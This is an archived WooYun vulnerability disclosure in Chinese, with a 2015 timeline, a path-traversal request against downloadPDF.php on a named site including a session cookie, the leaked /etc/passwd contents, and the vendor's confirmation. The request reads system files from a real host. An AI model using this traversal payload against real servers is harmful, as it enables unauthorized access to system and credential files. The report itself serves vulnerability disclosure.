乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-16: 细节已通知厂商并且等待厂商处理中 2015-08-18: 厂商已经确认,细节仅向厂商公开 2015-08-28: 细节向核心白帽子及相关领域专家公开 2015-09-07: 细节向普通白帽子公开 2015-09-17: 细节向实习白帽子公开 2015-10-02: 细节向公众公开
厂商能不能>>用良心<<给个高rank,不忽略!!!!!
GET //downloadPDF.php?filename=../../../../../../../../../../etc/passwd HTTP/1.1Host: icp.now.cnAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.107 Safari/537.36Accept-Encoding: gzip, deflate, sdchAccept-Language: zh-CN,zh;q=0.8Cookie: PHPSESSID=ncc0vk96i7fl4g97e3cnfbpps5
root:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/bin/bashdaemon:x:2:2:Daemon:/sbin:/bin/bashlp:x:4:7:Printing daemon:/var/spool/lpd:/bin/bashmail:x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/falsenews:x:9:13:News system:/etc/news:/bin/bashuucp:x:10:14:Unix-to-Unix CoPy system:/etc/uucp:/bin/bashgames:x:12:100:Games account:/var/games:/bin/bashman:x:13:62:Manual pages viewer:/var/cache/man:/bin/bashwwwrun:x:30:8:WWW daemon apache:/var/lib/wwwrun:/bin/falseftp:x:40:49:FTP account:/srv/ftp:/bin/bashnobody:x:65534:65533:nobody:/var/lib/nobody:/bin/bashmessagebus:*:100:101:User for D-Bus:/var/run/dbus:/bin/falsesshd:*:101:102:SSH daemon:/var/lib/sshd:/bin/falseusbmux:x:102:65534:usbmuxd daemon:/var/lib/usbmuxd:/sbin/nologinntp:x:74:104:NTP daemon:/var/lib/ntp:/bin/falsestatd:x:103:65534:NFS statd daemon:/var/lib/nfs:/sbin/nologinmysql:x:104:105:MySQL server:/var/lib/mysql:/bin/bashhttpd:x:1000:1000::/home/httpd:/sbin/nologingit:x:1001:100::/home/git:/bin/bashreboot:x:1002:100::/home/reboot:/bin/bash
危害等级:高
漏洞Rank:10
确认时间:2015-08-18 12:58
我们会尽快修复,谢谢你们提供的漏洞 ^_^
暂无